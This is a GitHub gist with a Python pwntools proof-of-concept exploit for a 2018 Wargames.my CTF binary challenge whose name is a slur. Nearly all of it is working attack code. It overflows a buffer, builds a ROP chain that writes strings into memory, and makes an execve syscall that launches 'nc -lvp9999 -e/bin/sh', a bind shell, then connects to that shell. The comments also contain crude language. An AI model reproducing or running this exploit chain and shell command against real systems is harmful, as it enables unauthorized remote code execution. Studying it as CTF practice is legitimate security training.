Skip to content

Instantly share code, notes, and snippets.

@shahril96
Created Dec 10, 2018
Embed
What would you like to do?
POC for Wargames.my 2018's faggot2.0 challenge
from pwn import *
context.terminal = ['konsole', '-e', 'sh', '-c']
def split2len(s, n):
def _f(s, n):
while s:
yield s[:n]
s = s[n:]
return list(_f(s, n))
'''
START BUILDING OUR ROP CHAINS
'''
def write(addr, data):
''' write data into addr '''
addr = addr + 8 # to suite [rbp-8]
payload = ''
for each in split2len(data, 4):
payload += p64(0x400840) # pop rbp; ret;
payload += p64(addr) # rbp = addr
payload += p64(0x4009d2) # pop rax; ret;
payload += each.ljust(8, '\x00') # rax = string chunk with left 0x0 padding
payload += p64(0x4009cf) # mov dword ptr [rbp - 8], eax; pop rax; ret;
payload += 'junk'*2
addr += 4
return payload
# ROP addresses
WRITABLE_ADDR = 0x602000
payload = 'A'*152 # padding before return address overwrite
exec_code = '/usr/bin/nc -lvp9999 -e/bin/sh'.split(' ')
# write `exec_code` into writable section
addr = []
for each in exec_code:
payload += write(WRITABLE_ADDR, each)
addr.append(WRITABLE_ADDR)
WRITABLE_ADDR += len(each) + 1 # reason for +1 is to don't overwrite null terminator
# write addresses into memory to mimic argv[], for our execve() friend
addr.append(0x0)
payload += write(WRITABLE_ADDR, ''.join([p64(each) for each in addr]))
'''
ref: http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/
sys_execve (rax = 51)
1st param (rdi) = const char *filename)
2nd param (rsi) = const char *const argv[]
3rd param (rdx) = const char *const envp[]
'''
# prepare rsi
payload += p64(0x400ba1) # pop rsi; pop r15; ret;
payload += p64(WRITABLE_ADDR)
payload += 'junk'*2
# prepare rdi
payload += p64(0x400ba3) # pop rdi; ret;
payload += p64(addr[0])
# prepare rax
payload += p64(0x4009d2) # pop rax; ret;
payload += p64(59)
# get shell, bitch!
payload += p64(0x4009d4) # syscall -> execve("nc", {"nc", "-lvp9999", "-e/bin/sh", NULL}, envp);
# end peacefully
'''
payload += p64(0x400ba3) # pop rdi; ret;
payload += p64(0x0)
payload += p64(0x4009d2) # pop rax; ret;
payload += p64(60)
payload += p64(0x4009d4) # syscall -> exit(0)
'''
'''
END BUILDING OUR ROP CHAINS
'''
p = process('./faggot2.0')
"""
gdb.attach(p, '''
set follow-fork-mode child
break *0x4008D6
break *0x40091C
continue
''')
"""
print(payload)
r = remote('127.0.0.1', 31337)
r.sendline(str(len(payload)))
r.sendline(payload)
# wait for netcat
sleep(5)
r2 = remote('127.0.0.1', 9999)
r2.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment